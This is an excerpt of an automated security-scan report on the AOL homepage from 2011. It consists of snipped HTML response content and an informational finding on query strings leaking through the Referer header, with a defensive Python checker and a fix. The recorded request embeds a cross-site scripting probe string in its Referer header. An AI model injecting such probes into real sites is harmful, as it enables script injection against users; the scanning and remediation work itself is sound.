<li><a class="lnid-sec2_lnk4" href="http://www.dailyfinance.com/2011/08/18/back-to-school-fashion-uniforms-gain-popularity-and-coolness/">School Uniforms: More Popular, More Fashionable</a>
...[SNIP]...
<li><a class="lnid-sec2_lnk5" href="http://money.cnn.com/2011/08/18/news/international/markets_morgan_stanley/index.htm?iid=HP_LN">Morgan Stanley: We're 'Dangerously Close' to Recession</a>
...[SNIP]...
<li><a class="lnid-sec2_lnk6" href="http://247wallst.com/2011/08/17/the-richest-diamond-mines-in-the-world/">The Richest Diamond Mines in the World</a>
...[SNIP]...
</ul><a name="om_news_business-news_more" class="newsmore newsmoreinline lnid-sec3_lnk1" href="http://www.dailyfinance.com/">More Business News</a>
...[SNIP]...
<h2 id="om_news_sports-news_title"><a class="lnid-sec1_lnk1" href="http://www.fanhouse.com/">Sports News</a>
...[SNIP]...
<li><a href="http://aol.sportingnews.com/ncaa-basketball/story/2011-08-18/georgetown-game-in-china-ends-in-bench-clearing-brawl" class="lnid-sec2_lnk1">Basketball Game in China Ends With Bench-Clearing Brawl</a>
...[SNIP]...
<li><a href="http://aol.sportingnews.com/nfl/story/2011-08-18/michael-vick-to-gq-i-miss-my-dogs" class="lnid-sec2_lnk2">Michael Vick Says He Misses Owning Dogs</a>
...[SNIP]...
<li><a href="http://aol.sportingnews.com/mlb/story/2011-08-18/hideki-irabus-death-officially-ruled-a-suicide" class="lnid-sec2_lnk3">Ex-Yankee Irabu's Death Officially Ruled a Suicide</a>
...[SNIP]...
<li><a href="http://aol.sportingnews.com/nascar/story/2011-08-18/former-price-is-right-model-maryeve-dufault-racing-in-nascar" class="lnid-sec2_lnk4">Former Price is Right Model Making NASCAR Debut</a>
...[SNIP]...
<li><a href="http://aol.sportingnews.com/sport/story/2011-08-18/tiger-woods-lebron-james-accused-of-being-cheap-tippers" class="lnid-sec2_lnk5">Tiger, LeBron accused of being cheap tippers</a>
...[SNIP]...
<li><a href="http://aol.sportingnews.com/mlb/story/2011-08-18/mike-jacobs-tests-positive-for-hgh-is-released-by-rockies" class="lnid-sec2_lnk6">Minor League Player Suspended 50 Games for HGH Use</a>
...[SNIP]...
<li><a href="http://aol.sportingnews.com/ncaa-football/story/2011-08-18/barry-alvarez-chad-1-million-loss-in-shapiro-ponzi-scheme" class="lnid-sec2_lnk7">Wisconsin AD and Family Lose $1 Million in Ponzi Scheme</a>
...[SNIP]...
</ul><a name="om_news_sports-news_more" class="newsmore newsmoreinline lnid-sec3_lnk1" href="http://www.fanhouse.com">More Stories</a>
...[SNIP]...
<h2 id="om_news_entertainment-news_title"><a class="lnid-sec1_lnk1" href="http://www.huffingtonpost.com/entertainment/">Entertainment News</a>
...[SNIP]...
<li><a href="http://www.huffingtonpost.com/2011/08/18/josh-groban-joins-the-office_n_930818.html" class="lnid-sec2_lnk1">'The Office' Gets An Unexpected New Star</a>
...[SNIP]...
<li><a href="http://www.huffingtonpost.com/2011/08/18/betty-white-is-americas-most-trusted-celebrity_n_930740.html" class="lnid-sec2_lnk2">Betty White: America's Most Trusted Celebrity</a>
...[SNIP]...
<li><a href="http://www.huffingtonpost.com/2011/08/18/stage-collapse-at-pukkelpop-belgium-kills_n_930705.html" class="lnid-sec2_lnk3">Another Stage Collapse Kills At Least One</a>
...[SNIP]...
<li><a href="http://www.huffingtonpost.com/2011/08/18/texas-killing-fields-trailer_n_930675.html" class="lnid-sec2_lnk4">Sam Worthington, Jessica Chastain Enter Killing Fields</a>
...[SNIP]...
<li><a href="http://www.huffingtonpost.com/2011/08/18/justin-bieber-tops-list-of-richest-teen-entertainers_n_930578.html" class="lnid-sec2_lnk5">Who Are Hollywood's Richest Teens?</a>
...[SNIP]...
<li><a href="http://www.huffingtonpost.com/2011/08/18/blade-runner-ridley-scott-new-film_n_930593.html" class="lnid-sec2_lnk6">Legendary Film Getting Unexpected Revamp</a>
...[SNIP]...
<li><a href="http://www.huffingtonpost.com/2011/08/18/burt-reynolds-facing-foreclosure_n_930443.html" class="lnid-sec2_lnk7">Burt Reynolds Facing Foreclosure</a>
...[SNIP]...
<li><a href="http://www.huffingtonpost.com/2011/08/18/kim-kardashians-wedding-workout_n_930316.html" class="lnid-sec2_lnk8">WATCH: Kim Kardashian's Wedding Workout</a>
...[SNIP]...
</ul><a name="om_news_entertainment-news_more" class="newsmore newsmoreinline lnid-sec3_lnk1" href="http://www.huffingtonpost.com/entertainment/">More Entertainment News</a>
...[SNIP]...
andalonevj-.5- adrefresh-true hiderelvids- lnid-sec2_lnk1 vplident-1116699228001 vplname-urlesque-mans-about-to-do-the-impossible" href="video/urlesque-mans-about-to-do-the-impossible/1116699228001/"><img height="155" width="233" class="vjimg" src="http://i.huffpost.com/gen/332441/thumbs/a-MAN-DEFIES-PHYSICS-233x155.jpg"/><div class="vbpos-bottom-right videobutton" style="width:41px; height:41px; ">
<img src="http://portal.aolcdn.com/p5/forms/1439/4d409bd3-5f87-4f0a-adb2-b0fa9450f8c6.png" alt="" class="playbutton" title=""/><img src="http://portal.aolcdn.com/p5/forms/1439/b81d51ea-1a48-4e8d-9495-9ecbf12c337c.png" alt="" class="playbutton-over" title=""/><div class="vbtext" title="">
...[SNIP]...
<div class="gmod photo-lede mnid-daily-buzz1 plid-87598">
<a title="Price Is Right" name="om_daily-buzz_image_1" class="photo-link lnid-sec2_lnk1" href="http://aol.sportingnews.com/nascar/story/2011-08-18/former-price-is-right-model-maryeve-dufault-racing-in-nascar"><img alt="Price Is Right" src="http://i.huffpost.com/gen/332819/thumbs/a-MODEL-NASCAR-233x155.jpg"/></a>
...[SNIP]...
<h3><a name="om_daily-buzz_headline1" href="http://aol.sportingnews.com/nascar/story/2011-08-18/former-price-is-right-model-maryeve-dufault-racing-in-nascar" class=" lnid-sec2_lnk3">Former 'Price Is Right' Model Makes Unexpected Debut</a>
...[SNIP]...
<div class="gmod photo-lede mnid-daily-buzz2 plid-87597">
<a title="Chipotle" name="om_daily-buzz_image_2" class="photo-link lnid-sec3_lnk1" href="http://www.huffingtonpost.com/2011/08/18/chipotle-menu_n_930267.html"><img alt="Chipotle" src="http://i.huffpost.com/gen/332774/thumbs/a-CHIPOTLE-233x155.jpg"/></a>
...[SNIP]...
<h3><a name="om_daily-buzz_headline2" href="http://www.huffingtonpost.com/2011/08/18/chipotle-menu_n_930267.html" class=" lnid-sec3_lnk3">Chipotle Makes Nauseating Confession</a>
...[SNIP]...
<div class="gmod photo-lede mnid-daily-buzz3 plid-87639">
<a title="Russell Armstrong" name="om_daily-buzz_image_3" class="photo-link lnid-sec4_lnk1" href="http://www.huffingtonpost.com/2011/08/18/russell-armstrong-suicide-salary-bravo_n_930722.html"><img alt="Russell Armstrong" src="http://portal.aolcdn.com/p5/forms/656/00174597-3ffe-4883-9330-a301427eb1b9.jpg"/></a>
...[SNIP]...
<h3><a name="om_daily-buzz_headline3" href="http://www.huffingtonpost.com/2011/08/18/russell-armstrong-suicide-salary-bravo_n_930722.html" class=" lnid-sec4_lnk3">Russell's 'Housewives' Salary Not What You Might Think</a>
...[SNIP]...
<div class="gmod photo-lede mnid-daily-buzz4 plid-87630">
<a title="Belgium stage collapse" name="om_daily-buzz_image_4" class="photo-link lnid-sec5_lnk1" href="http://www.spinner.com/2011/08/18/smith-westerns-pukkelpop-stage-collapse/"><img alt="Belgium stage collapse" src="http://portal.aolcdn.com/p5/forms/2560/b289c2ee-3110-4211-98a8-3ec20b6bf58f.jpg"/></a>
...[SNIP]...
<h3><a name="om_daily-buzz_headline4" href="http://www.spinner.com/2011/08/18/smith-westerns-pukkelpop-stage-collapse/" class=" lnid-sec5_lnk3">Watch: Stage Collapse Kills 3 Music Fans, Injures Scores</a>
...[SNIP]...
<div class="gmod photo-lede mnid-daily-buzz5 plid-87595">
<a title="Pug" name="om_daily-buzz_image_5" class="photo-link lnid-sec6_lnk1" href="http://www.huffingtonpost.com/2011/08/17/otis-the-skydiving-pug-photo-video_n_929874.html"><img alt="Pug" src="http://i.huffpost.com/gen/332759/thumbs/a-PUG-233x155.jpg"/></a>
...[SNIP]...
<h3><a name="om_daily-buzz_headline5" href="http://www.huffingtonpost.com/2011/08/17/otis-the-skydiving-pug-photo-video_n_929874.html" class=" lnid-sec6_lnk3">Watch: 'Skydiving Pug' Makes 64th Jump</a>
...[SNIP]...
<div class="gmod photo-lede mnid-daily-buzz6 plid-87599">
<a title="Obama" name="om_daily-buzz_image_6" class="photo-link lnid-sec7_lnk1" href="http://www.huffingtonpost.com/2011/08/18/presidential-vacations-th_n_929376.html"><img alt="Obama" src="http://i.huffpost.com/gen/332814/thumbs/a-OBAMA-233x155.jpg"/></a>
...[SNIP]...
<h3><a name="om_daily-buzz_headline6" href="http://www.huffingtonpost.com/2011/08/18/presidential-vacations-th_n_929376.html" class=" lnid-sec7_lnk3">Photos: Embarrassing Pics Of Presidents on Vacation</a>
...[SNIP]...
<div class="gmod photo-lede mnid-daily-buzz7 plid-87559">
<a title="Nivea" name="om_daily-buzz_image_7" class="photo-link lnid-sec8_lnk1" href="http://www.huffingtonpost.com/2011/08/18/nivea-ad-racist_n_930501.html"><img alt="Nivea" src="http://i.huffpost.com/gen/332706/thumbs/a-NIVEA-1-233x155.jpg"/></a>
...[SNIP]...
<h3><a name="om_daily-buzz_headline7" href="http://www.huffingtonpost.com/2011/08/18/nivea-ad-racist_n_930501.html" class=" lnid-sec8_lnk3">Is Nivea's Controversial Ad <i>
...[SNIP]...
<div class="gmod photo-lede mnid-daily-buzz8 plid-87561">
<a title="Walmart" name="om_daily-buzz_image_8" class="photo-link lnid-sec9_lnk1" href="http://www.huffingtonpost.com/2011/08/18/monkey-scratches-young-girl_n_930365.html"><img alt="Walmart" src="http://i.huffpost.com/gen/332686/thumbs/a-GIRL-MONKEY-233x155.jpg"/></a>
...[SNIP]...
<h3><a name="om_daily-buzz_headline8" href="http://www.huffingtonpost.com/2011/08/18/monkey-scratches-young-girl_n_930365.html" class=" lnid-sec9_lnk3">Watch: Monkey Attacks Girl In Walmart Parking Lot</a>
...[SNIP]...
<a title="Lady Gaga" name="om_daily-buzz_image_9" class="photo-link lnid-sec10_lnk1" href="http://blog.music.aol.com/2011/08/18/lady-gaga-goes-braless-for-vma-promo"><img alt="Lady Gaga" src="http://i.huffpost.com/gen/303009/thumbs/a-GAGA-TWITTER-233x155.jpg"/></a>
...[SNIP]...
</span>
<a target="_blank" class="feedback" href="http://www.opselect.com/ad_feedback/survey.adp?src=115">Ad Feedback</a>
...[SNIP]...
<a id="adchoicelink" name="om_adchoices_link" class="feedback" href="http://adinfo.aol.com/about-our-ads/">Ad Choices<img class="feedback" src="http://portal.aolcdn.com/p5/forms/1245/9db9a9bc-ecd8-4f18-a67c-adc647f55731.jpg"/></a>
...[SNIP]...
<h3><a name="om_custom-content-1_headline" href="http://www.huffingtonpost.com/2011/08/11/kickstart-cleanse-huffpost-aol-challenge_n_922140.html?icid=acm50exclusive082011" class=" lnid-sec2_lnk1">Kick-Start Cleanse Community Challenge</a>
...[SNIP]...
<div class="video-still">
<a alt="" name="om_custom-content-1_image" href="http://www.huffingtonpost.com/2011/08/11/kickstart-cleanse-huffpost-aol-challenge_n_922140.html?icid=acm50exclusive082011"><img height="131" width="131" src="http://portal.aolcdn.com/p5/forms/678/b7783c03-e35d-42ef-9dad-f25c9643bfaa.jpg"/></a>
...[SNIP]...
<b><a href="http://www.huffingtonpost.com/2011/08/11/kickstart-cleanse-huffpost-aol-challenge_n_922140.html?icid=acm50exclusive082011" class=" lnid-sec2_lnk2">Sign up now!</a>
...[SNIP]...
<div class="story">
<a href="http://www.huffingtonpost.com/2011/08/17/christine-odonnell-walks-out-witchcraft_n_929986.html" name="om_trending-stories_img_1" class="lnid-sec1_lnk1 storyimg"><img src="http://i.huffpost.com/gen/331945/thumbs/s-CHRISTINE-ODONNELL-INTERVIEW-WITCHCRAFT-mini.jpg" alt="CHRISTINE ODONNELL INTERVIEW WITCHCRAFT"/></a><p><a href="http://www.huffingtonpost.com/politics" name="om_trending-stories_attr_1" class="lnid-sec1_lnk3 storyattr">Politics</a>: <a href="http://www.huffingtonpost.com/2011/08/17/christine-odonnell-walks-out-witchcraft_n_929986.html" name="om_trending-stories_link_1" class="lnid-sec1_lnk2 storytxt">Christine O'Donnell Walks Out Of CNN Interview</a>
...[SNIP]...
<div class="story">
<a href="http://www.dailyfinance.com/2011/08/17/social-security-mistakenly-declares-thousands-dead-each-year/" name="om_trending-stories_img_2" class="lnid-sec2_lnk1 storyimg"><img src="http://www.blogcdn.com/www.dailyfinance.com/media/2011/08/death-social-security-240cs081711_74x58.jpg" alt=""/></a><p><a href="http://www.dailyfinance.com" name="om_trending-stories_attr_2" class="lnid-sec2_lnk3 storyattr">Daily Finance</a>: <a href="http://www.dailyfinance.com/2011/08/17/social-security-mistakenly-declares-thousands-dead-each-year/" name="om_trending-stories_link_2" class="lnid-sec2_lnk2 storytxt">Social Security Mistakenly Declares Thousands Dead Each Year</a>
...[SNIP]...
<div class="story">
<a href="http://www.huffingtonpost.com/2011/08/18/anderson-cooper-loses-it-giggles-laughter_n_930208.html" name="om_trending-stories_img_3" class="lnid-sec3_lnk1 storyimg"><img src="http://i.huffpost.com/gen/332133/thumbs/s-ANDERSON-COOPER-mini.jpg" alt="ANDERSON COOPER"/></a><p><a href="http://www.huffingtonpost.com/media" name="om_trending-stories_attr_3" class="lnid-sec3_lnk3 storyattr">Media</a>: <a href="http://www.huffingtonpost.com/2011/08/18/anderson-cooper-loses-it-giggles-laughter_n_930208.html" name="om_trending-stories_link_3" class="lnid-sec3_lnk2 storytxt">WATCH: Anderson Cooper LOSES It, Collapses Into Huge Fit Of Giggles</a>
...[SNIP]...
<div class="story">
<a href="http://www.dailyfinance.com/2011/08/16/savings-experiment-get-the-best-bling-for-your-buck-when-buying/" name="om_trending-stories_img_4" class="lnid-sec4_lnk1 storyimg"><img src="http://www.blogcdn.com/www.dailyfinance.com/media/2011/08/diamond-ring-240cs081611-1313425590_74x58.jpg" alt="Diamond Ring"/></a><p><a href="http://www.dailyfinance.com" name="om_trending-stories_attr_4" class="lnid-sec4_lnk3 storyattr">Daily Finance</a>: <a href="http://www.dailyfinance.com/2011/08/16/savings-experiment-get-the-best-bling-for-your-buck-when-buying/" name="om_trending-stories_link_4" class="lnid-sec4_lnk2 storytxt">Savings Experiment: Get the Best Bling for Your Buck When Buying a Diamond Ring</a>
...[SNIP]...
<div class="story">
<a href="http://www.mmafighting.com/2011/08/17/krzysztof-soszynski-says-at-least-85-percent-of-fighters-defini/" name="om_trending-stories_img_5" class="lnid-sec5_lnk1 storyimg"><img src="http://www.blogcdn.com/www.mmafighting.com/media/2011/08/ksos_74x58.jpg" alt=""/></a><p><a href="http://www.mmafighting.com" name="om_trending-stories_attr_5" class="lnid-sec5_lnk3 storyattr">MMA Fighting</a>: <a href="http://www.mmafighting.com/2011/08/17/krzysztof-soszynski-says-at-least-85-percent-of-fighters-defini/" name="om_trending-stories_link_5" class="lnid-sec5_lnk2 storytxt">Krzysztof Soszynski Says at Least 85 Percent of Fighters 'Definitely Using' PEDs</a>
...[SNIP]...
<div class="story">
<a href="http://www.huffingtonpost.com/2011/08/18/abigail-breslin-in-the-class-project_n_930172.html" name="om_trending-stories_img_6" class="lnid-sec6_lnk1 storyimg"><img src="http://i.huffpost.com/gen/332095/thumbs/s-BRESLIN-mini.jpg" alt="BRESLIN"/></a><p><a href="http://www.huffingtonpost.com/celebrity" name="om_trending-stories_attr_6" class="lnid-sec6_lnk3 storyattr">Celebrity</a>: <a href="http://www.huffingtonpost.com/2011/08/18/abigail-breslin-in-the-class-project_n_930172.html" name="om_trending-stories_link_6" class="lnid-sec6_lnk2 storytxt">Abigail Breslin Goes Dark: Teen Mom Murderer</a>
...[SNIP]...
<div class="story last">
<a href="http://www.aoltv.com/2011/08/17/dancing-with-the-stars-season-13-george-clooneys-ex-in-quee/" name="om_trending-stories_img_7" class="lnid-sec7_lnk1 storyimg"><img src="http://www.blogcdn.com/www.aoltv.com/media/2011/08/elisabetta-wireimage-300_74x58.jpg" alt="Elisabette Canalis"/></a><p><a href="http://www.aoltv.com" name="om_trending-stories_attr_7" class="lnid-sec7_lnk3 storyattr">AOL TV</a>: <a href="http://www.aoltv.com/2011/08/17/dancing-with-the-stars-season-13-george-clooneys-ex-in-quee/" name="om_trending-stories_link_7" class="lnid-sec7_lnk2 storytxt">'Dancing With the Stars' Season 13: George Clooney's Ex In, Queen Latifah Out</a>
...[SNIP]...
<div class="aol-twitter-like lnid-sec1_lnk2" id="om_followme_2_follow-me-module">
<a href="http://twitter.com/AOL" data-show-count="false" class="twitter-follow-button followmemodule_TWlike">Follow @AOL</a>
...[SNIP]...
</div>
<a name="om_followme_3" href="http://aol.it/jmiFya" class="nlm lnid-sec1_lnk3 last">Newsletter</a>
...[SNIP]...
<h2><a name="om_featured-blog-posts-feed_title" class="lnid-sec1_lnk1" href="http://www.huffingtonpost.com/theblog/index/">Featured Blog Posts</a>
...[SNIP]...
<div class="about">
<img class="headshot" alt="Bonnie Fuller" src="http://s.huffpost.com/contributors/bonnie-fuller/headshot.jpg"/>
<p class="vertical"><a href="http://www.huffingtonpost.com/entertainment" name="om_featured-blog-rss_sec2_vert" class="lnid-sec2_lnk1">ENTERTAINMENT</a>
...[SNIP]...
<h3 class="headline"><a href="http://www.huffingtonpost.com/bonnie-fuller/kim-kardashian-married_b_930798.html" name="om_featured-blog-rss_sec2_hl" class="headline lnid-sec2_lnk2">Kim Kardashian: 10 Tips to Make Your Marriage Last Forever</a>
...[SNIP]...
<p class="read"><a href="http://www.huffingtonpost.com/bonnie-fuller/kim-kardashian-married_b_930798.html" name="om_featured-blog-rss_sec2_read" class="read lnid-sec2_lnk3">Read Post</a> | <a href="http://www.huffingtonpost.com/bonnie-fuller/kim-kardashian-married_b_930798.html#comments" name="om_featured-blog-rss_sec2_cmnt" class="comments lnid-sec2_lnk4">Comments</a>
...[SNIP]...
<div class="about">
<img class="headshot" alt="Jon M. Sweeney" src="http://s.huffpost.com/contributors/jon-m-sweeney/headshot.jpg"/>
<p class="vertical"><a href="http://www.huffingtonpost.com/religion" name="om_featured-blog-rss_sec3_vert" class="lnid-sec3_lnk1">RELIGION</a>
...[SNIP]...
<h3 class="headline"><a href="http://www.huffingtonpost.com/jon-m-sweeney/lady-gaga-catholic_b_926420.html" name="om_featured-blog-rss_sec3_hl" class="headline lnid-sec3_lnk2">Is Lady Gaga Catholic?</a>
...[SNIP]...
<p class="read"><a href="http://www.huffingtonpost.com/jon-m-sweeney/lady-gaga-catholic_b_926420.html" name="om_featured-blog-rss_sec3_read" class="read lnid-sec3_lnk3">Read Post</a> | <a href="http://www.huffingtonpost.com/jon-m-sweeney/lady-gaga-catholic_b_926420.html#comments" name="om_featured-blog-rss_sec3_cmnt" class="comments lnid-sec3_lnk4">Comments</a>
...[SNIP]...
<div class="about">
<img class="headshot" alt="Melissa Lafsky" src="http://s.huffpost.com/contributors/melissa-lafsky/headshot.jpg"/>
<p class="vertical"><a href="http://www.huffingtonpost.com/women" name="om_featured-blog-rss_sec4_vert" class="lnid-sec4_lnk1">WOMEN</a>
...[SNIP]...
<h3 class="headline"><a href="http://www.huffingtonpost.com/melissa-lafsky/5-truths-about-your-paren_b_930216.html" name="om_featured-blog-rss_sec4_hl" class="headline lnid-sec4_lnk2">5 Truths About Your Parents That No One Tells You</a>
...[SNIP]...
<p class="read"><a href="http://www.huffingtonpost.com/melissa-lafsky/5-truths-about-your-paren_b_930216.html" name="om_featured-blog-rss_sec4_read" class="read lnid-sec4_lnk3">Read Post</a> | <a href="http://www.huffingtonpost.com/melissa-lafsky/5-truths-about-your-paren_b_930216.html#comments" name="om_featured-blog-rss_sec4_cmnt" class="comments lnid-sec4_lnk4">Comments</a>
...[SNIP]...
<a title="Child Preacher" name="om_vidfeat_image1" class="lnid-sec2_lnk1 icid-BTFimage3" href="http://video.aol.com/video/pint-sized-preacher/92871091"><img alt="Child Preacher" src="http://o.aolcdn.com/hss/storage/adam/92353343297a85c42004c42fcbe733d8/pint-sized-preacher.jpg"/></a>
...[SNIP]...
<a title="doughnuts!" name="om_vidfeat_image2" class="lnid-sec3_lnk1 icid-BTFimage1" href="http://video.aol.com/video/how-to-make-homemade-doughnuts/590730756"><img alt="doughnuts!" src="http://o.aolcdn.com/hss/storage/adam/5d60ce9fc3d0b921b344beb563fba9e8/CIA-Class_MG_1804-456.jpg"/></a>
...[SNIP]...
<a title="Flawless skin" name="om_vidfeat_image3" class="lnid-sec4_lnk1 icid-BTFimage2" href="http://video.aol.com/video/flawless-face-how-to-cover-up-acne/2545363948"><img alt="Flawless skin" src="http://o.aolcdn.com/hss/storage/adam/b9a2ef60d3c7ed958f77bf69067923d/flawless-face-how-to-cover-up-acne.jpg"/></a>
...[SNIP]...
<div class="mpid-9">
<img src="http://leadback.advertising.com/adcedge/lb?site=695501&srvc=1&betr=aolcom_cs=1&betq=13668=438747" width="1" height="1" border="0" /> </div>
...[SNIP]...
<span class="mnid-brand-3 plid-74995"><a class="lnid-sec1_lnk1 icid-brandfooter_aboutme brand20" href="http://about.me/" name="om_brands_aboutme">about.me</a>
...[SNIP]...
<span class="mnid-brand-5 plid-75012"><a class="lnid-sec1_lnk1 icid-brandfooter_shoutcast brand62" href="http://www.shoutcast.com/" name="om_brands_shoutcast">Shoutcast</a>
...[SNIP]...
<span class="mnid-brand-7 plid-79414"><a class="lnid-sec1_lnk1 icid-brandfooter_spinner brand52" href="http://www.spinner.com/" name="om_brands_spinner">Spinner</a>
</span><span class="mnid-brand-8 plid-79337"><a class="lnid-sec1_lnk1 icid-brandfooter_joystiq brand21" href="http://www.joystiq.com/" name="om_brands_joystiq">Joystiq</a>
...[SNIP]...
</font><a href="http://bit.ly/btxTZj" class="fb lnid-sec1_lnk9" target="_blank" name="om_followme1">Facebook</a>
...[SNIP]...
</a> | <a href="http://bit.ly/cCSb2K" class="rss lnid-sec1_lnk11" target="_blank" name="om_followme3">RSS</a>
...[SNIP]...
</div>
<script type="text/javascript" src="http://portal.aolcdn.com/p5/_v58.6/js/main.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://o.aolcdn.com/videoplayer/loader.js"></script>
<script type="text/javascript" src="http://player.play.it/player/launchAolPlayer.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...

6.2. http://www.aol.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aol.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string (the request below is GET /?r=404, i.e. http://www.aol.com/?r=404). The response contains links to other domains (for example the huffingtonpost.com, aim.com and aol.sportingnews.com targets visible in the response body below). When a user follows one of those links, the browser sends the full page URL, including the query string, in the Referer header to the third-party site, so any sensitive value carried in the query string is disclosed to that site. The r=404 value here is harmless in itself; the finding matters where session identifiers, password-reset or anti-CSRF tokens are placed in the URL.
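The following Python script is an added example for this report (it is not part of the XSS.CX or Burp scanner output) that reproduces the check behind this finding on an offline sample: it takes the page URL, the response headers and the HTML body, collects the anchors whose host differs from the page host, skips links that carry rel="noreferrer", and reports a leak only when the URL has a query string, off-site links exist, and neither a Referrer-Policy header nor a <meta name="referrer"> tag withholds the path and query from cross-origin navigations. The request URL and the absence of a Referrer-Policy header are taken from the request/response below; the HTML snippet, the rel="noreferrer" attribute on one link and the mailto: link are constructed to exercise the edge cases.

```python
"""Cross-domain Referer leakage check (added example, not scanner code).

Condition flagged: page URL carries a query string, the response links to
other hosts, and no referrer policy strips the path/query for cross-origin
requests. Without a policy, the browser default sends the full URL as the
Referer to http(s) targets, so the query string reaches the third party."""
from html.parser import HTMLParser
from urllib.parse import urlsplit, urljoin


class _LinkCollector(HTMLParser):
    """Collect <a href> targets (with rel=noreferrer flag) and <meta name=referrer>."""

    def __init__(self):
        super().__init__()
        self.links = []          # list of (href, has_noreferrer)
        self.meta_referrer = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "a" and a.get("href"):
            rel = (a.get("rel") or "").lower().split()
            self.links.append((a["href"], "noreferrer" in rel))
        elif tag == "meta" and (a.get("name") or "").lower() == "referrer":
            self.meta_referrer = a.get("content") or ""


def _host(url):
    return (urlsplit(url).hostname or "").lower()


# Referrer-Policy values that keep the path and query off cross-origin requests.
SAFE_POLICIES = {
    "no-referrer", "origin", "strict-origin", "same-origin",
    "origin-when-cross-origin", "strict-origin-when-cross-origin",
}


def find_referer_leak(page_url, response_headers, html):
    """Describe whether following a link on this page leaks the page's
    query string to another host through the Referer header."""
    page_host = _host(page_url)
    query = urlsplit(page_url).query

    parser = _LinkCollector()
    parser.feed(html)

    cross_domain = set()
    for href, noreferrer in parser.links:
        target = urljoin(page_url, href)          # resolve relative links
        if urlsplit(target).scheme not in ("http", "https"):
            continue                              # mailto:, javascript: carry no Referer
        if _host(target) and _host(target) != page_host and not noreferrer:
            cross_domain.add(target)

    headers = {k.lower(): v for k, v in response_headers.items()}
    policy = headers.get("referrer-policy") or parser.meta_referrer
    policy = policy.strip().lower() if policy else None

    return {
        "query_string": query,
        "cross_domain_links": sorted(cross_domain),
        "referrer_policy": policy,
        "leaks": bool(query) and bool(cross_domain) and policy not in SAFE_POLICIES,
    }


# Constructed sample mirroring the finding: GET /?r=404, no Referrer-Policy
# header in the response, off-site anchors in the body. The rel="noreferrer"
# and mailto: links are added here to show which anchors are excluded.
SAMPLE_URL = "http://www.aol.com/?r=404"
SAMPLE_HEADERS = {
    "Content-Type": "text/html;;charset=utf-8",
    "Cache-Control": "no-cache, no-store, private, max-age=0",
}
SAMPLE_HTML = """
<a href="?icid=aolcomlogorefresh5&dlact=dl1">refresh</a>
<a href="http://www.huffingtonpost.com/">Huffington Post</a>
<a href="http://www.dailyfinance.com/market-news/">Markets</a>
<a href="http://twitter.com/AOL" rel="noreferrer">Follow @AOL</a>
<a href="mailto:feedback@example.invalid">mail</a>
"""

if __name__ == "__main__":
    for key, value in find_referer_leak(SAMPLE_URL, SAMPLE_HEADERS, SAMPLE_HTML).items():
        print(f"{key}: {value}")
```

Re-running the check with a Referrer-Policy: strict-origin-when-cross-origin header added to the headers (or with no query string in the URL) clears the finding, which is the fix a remediation should be verified against; the twitter.com link is not reported because rel="noreferrer" suppresses the header for that navigation alone.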

Request

GET /?r=404 HTTP/1.1
Host: www.aol.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.aol.com/video//%22ns=%22alert(0x000254)//%22ns=%22alert(0x000254)
Accept-Language: en-US
Accept-Encoding: gzip, deflate
Cookie: stips5=1
Connection: keep-alive
Proxy-Connection: keep-alive

Response

HTTP/1.1 200 OK
Date: Thu, 18 Aug 2011 23:26:33 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: vm-149-174-173-52.asset.aol.com
Content-Type: text/html;;charset=utf-8
Set-Cookie: JSESSIONID=CC0DF742115755B66658C29486BFC290; Path=/aol
Keep-Alive: timeout=5, max=37
Connection: Keep-Alive
Content-Length: 81368

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.fac
...[SNIP]...
</iframe>
<link rel="stylesheet" type="text/css" href="http://portal.aolcdn.com/p5/_v58.6/css/maing.css" />
<script type="text/javascript">
...[SNIP]...
</script>
<link rel="stylesheet" type="text/css" class="skin_link" href="http://portal.aolcdn.com/p5/skin/_v8/butterfly.css" />
<style>
...[SNIP]...
<body class="butterfly">
<script type="text/javascript" src="http://o.aolcdn.com/ads/adsWrapper.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://o.aolcdn.com/os/omniture/prod/omniunih_portal_min.js"></script>
...[SNIP]...
<a href="http://weather.aol.com/main.adp?location=USTX0327" class="lnid-sec1_lnk1" name="om_weathericon"><img class="wthr_avatar" alt="Dallas, TX: Mostly Clear" title="Dallas, TX: Mostly Clear" src="http://portal.aolcdn.com/p5/_v58.6/css/w/w33.png"/></a>
...[SNIP]...
<a id="aol-header-logo" title="Click here to refresh" name="om_hdrlogo" class="lnid-sec1_lnk1 " href="?icid=aolcomlogorefresh5&dlact=dl1"><img alt="Click here to refresh" src="http://portal.aolcdn.com/p5/forms/326/7116f573-7cda-4e8f-b2ec-b0d272075b69.png"/></a>
...[SNIP]...
<a href="http://mail.aol.com/" class="qnpos1 qn auth-0 show-500 hide-300 thresh-500 plid-47438 lnid-sec1_lnk1" name="om_quicknav_mail_flatstyle" title='AOL Mail' id='mailpreview'><img alt="" class="noion" src="http://portal.aolcdn.com/p5/forms/603/de739a04-4d4d-471b-be3d-5732e5db1aff.png"/><span>
...[SNIP]...
</div><a href="http://www.aim.com/products/express/" class="qnpos2 plid-51753 lnid-sec1_lnk2" name="om_quicknav_aim_flatstyle" title='AIM' id='aimexpress'><img alt="" class="noion" src="http://portal.aolcdn.com/p5/forms/603/de739a04-4d4d-471b-be3d-5732e5db1aff.png"/></a>
...[SNIP]...
tp://video.aol.com/" target="_blank" class="qnpos7 plid-84662 lnid-sec1_lnk7" name="om_quicknav_quick-nav-video_flatstyle" title='Get millions of video from AOL , AOL partners and third party videos'><img alt="" class="noion" src="http://portal.aolcdn.com/p5/forms/603/de739a04-4d4d-471b-be3d-5732e5db1aff.png"/></a>
...[SNIP]...
